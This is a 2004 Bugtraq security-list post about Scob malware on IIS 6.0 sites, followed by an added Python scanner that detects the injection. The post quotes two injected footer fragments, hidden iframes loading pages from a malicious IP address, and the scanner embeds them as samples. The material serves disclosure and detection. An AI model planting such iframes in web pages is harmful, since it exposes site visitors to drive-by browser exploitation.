Date: Wed, 7 Jul 2004 11:21:12 -0700
From: "Hubbard, Dan" <dhubbard@...sense.com>
To: <NTBUGTRAQ@...TSERV.NTBUGTRAQ.COM>, <bugtraq@...urityfocus.com>
Subject: Scob variant using IIS 6.0 or just upgrades ?


Our mining processes have uncovered more than 100 additional sites that
appear to have been breached and used as part of the "Scob" malcode.
Unlike the other sites discovered, these sites are NOT running IIS 5.0
and appear as though they are not using the IIS "footer" vulnerability.
There are two variants of jscript that appear to be using IE Iframe
vulnerabilities that they appear to be exploiting on the client side;
however, we cannot tell how the servers have been compromised. This may be
echoed information, however I have not seen any IIS 6.0 information
posted anywhere.

Current theory is that these machines were compromised as IIS 5.0 and
then upgraded but not cleaned.

* all pages on the sites are infected with malcode
* 96 out of 100 of the sites are also running HTTPS.
* all sites are running IIS 6.0, not 5.0

These are two variants of the HTML. Both appear at the bottom of the
HTML:

Variant 1
--------------

<script language="JavaScript"><!--
</script><iframe src=\"http://217.107.218.147/dot.php\" height=\"1\"
width=\"1\" scrolling=\"no\"
frameborder=\"no\"/>");sc088("trk716","4");}}// --></script>


Variant 2
--------------

<iframe width=0 height=0 src="http://217.107.218.147/fed.html"></iframe>

**Does anyone else have information as to what the URLs outlined above
contained and/or any information about compromised IIS 6.0 machines?**

**Perhaps these machines have simply been upgraded and the malcode was
not "cleaned" off them?**



_______________________________
Dan Hubbard
Security & Technology Research
Websense, Inc.


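The post quotes two injected fragments, both appended at the bottom of every page and both pointing a 1x1 or 0x0 iframe at 217.107.218.147. A site operator checking their own IIS 6.0 boxes for the same footer injection needs something that finds such frames even when the quotes are backslash-escaped inside a document.write() string, as in variant 1. The scanner below is an added example, not code from the original post or from Websense: the IP comes from the message, while the sample pages, the 512-byte "tail" window and the bare-IP heuristic are constructed assumptions for illustration. It goes a little beyond the post by also flagging any invisible iframe or bare-IP src, not only the quoted host, so it would catch a variant that had moved to a new drop site.

```python
"""Detect the hidden-iframe footer injection described in the Scob post.

Added example, not part of the original message. IOC_HOSTS holds the address
quoted in the post; the sample pages and thresholds below are constructed.
"""
import re
from urllib.parse import urlparse

IOC_HOSTS = {"217.107.218.147"}  # drop host quoted in the post

IFRAME_RE = re.compile(r"<iframe\b[^>]*>", re.I)
# Attribute parser tolerant of quoted, unquoted (width=0) and, after
# unescaping, JS-escaped (\"1\") values.
ATTR_RE = re.compile(
    r'([A-Za-z-]+)\s*=\s*(?:"([^"]*)"|\'([^\']*)\'|([^\s"\'>/]+))'
)

# Constructed sample pages: the two fragments from the post appended to a
# padded page, plus a clean page with an ordinary, visible iframe.
_PAGE_HEAD = "<html><body>" + "<p>lorem ipsum</p>\n" * 60
VARIANT_1 = r'''<script language="JavaScript"><!--
</script><iframe src=\"http://217.107.218.147/dot.php\" height=\"1\"
width=\"1\" scrolling=\"no\"
frameborder=\"no\"/>");sc088("trk716","4");}}// --></script>'''
VARIANT_2 = '<iframe width=0 height=0 src="http://217.107.218.147/fed.html"></iframe>'
SAMPLES = {
    "variant1": _PAGE_HEAD + VARIANT_1 + "\n</body></html>",
    "variant2": _PAGE_HEAD + VARIANT_2 + "\n</body></html>",
    "clean": ('<html><body><iframe src="https://www.example.com/widget" '
              'width="300" height="200"></iframe>' + "<p>lorem ipsum</p>\n" * 60
              + "</body></html>"),
}


def parse_iframe(tag):
    """Return the attributes of one <iframe ...> tag as a lowercase dict."""
    # Undo the backslash escaping used when the tag sits inside a
    # document.write("...") string, as in variant 1.
    tag = tag.replace('\\"', '"').replace("\\'", "'")
    attrs = {}
    for m in ATTR_RE.finditer(tag):
        value = m.group(2) or m.group(3) or m.group(4) or ""
        attrs[m.group(1).lower()] = value.strip()
    return attrs


def _dim(value):
    """Leading integer of a width/height value, or None if absent."""
    m = re.match(r"\d+", value or "")
    return int(m.group()) if m else None


def classify(attrs):
    """List the reasons an iframe looks like the injected frame (empty if none)."""
    reasons = []
    host = urlparse(attrs.get("src", "")).hostname or ""
    if host in IOC_HOSTS:
        reasons.append("src points at known Scob host")
    elif re.fullmatch(r"\d+\.\d+\.\d+\.\d+", host):
        reasons.append("src is a bare IP address")  # heuristic, assumption
    w, h = _dim(attrs.get("width")), _dim(attrs.get("height"))
    if w is not None and h is not None and w <= 1 and h <= 1:
        reasons.append(f"invisible frame ({w}x{h})")
    return reasons


def find_hidden_iframes(html, tail=512):
    """Return suspicious iframes in a page; at_tail marks the post's footer pattern."""
    findings = []
    for m in IFRAME_RE.finditer(html):
        attrs = parse_iframe(m.group())
        reasons = classify(attrs)
        if reasons:
            findings.append({
                "src": attrs.get("src", ""),
                "reasons": reasons,
                "at_tail": m.start() >= max(0, len(html) - tail),
            })
    return findings


def scan_pages(pages):
    """Map page name -> findings, keeping only pages with at least one hit."""
    return {name: hits for name, html in pages.items()
            if (hits := find_hidden_iframes(html))}


if __name__ == "__main__":
    for name, hits in scan_pages(SAMPLES).items():
        for hit in hits:
            where = "footer" if hit["at_tail"] else "body"
            print(f"{name}: {hit['src']} [{where}] {'; '.join(hit['reasons'])}")
```

Run it over a crawl of your own site (one file per page) rather than the constructed SAMPLES; a page whose only hit is a visible, named-host iframe produces nothing, while either quoted fragment is reported with its src and the "footer" position the post describes.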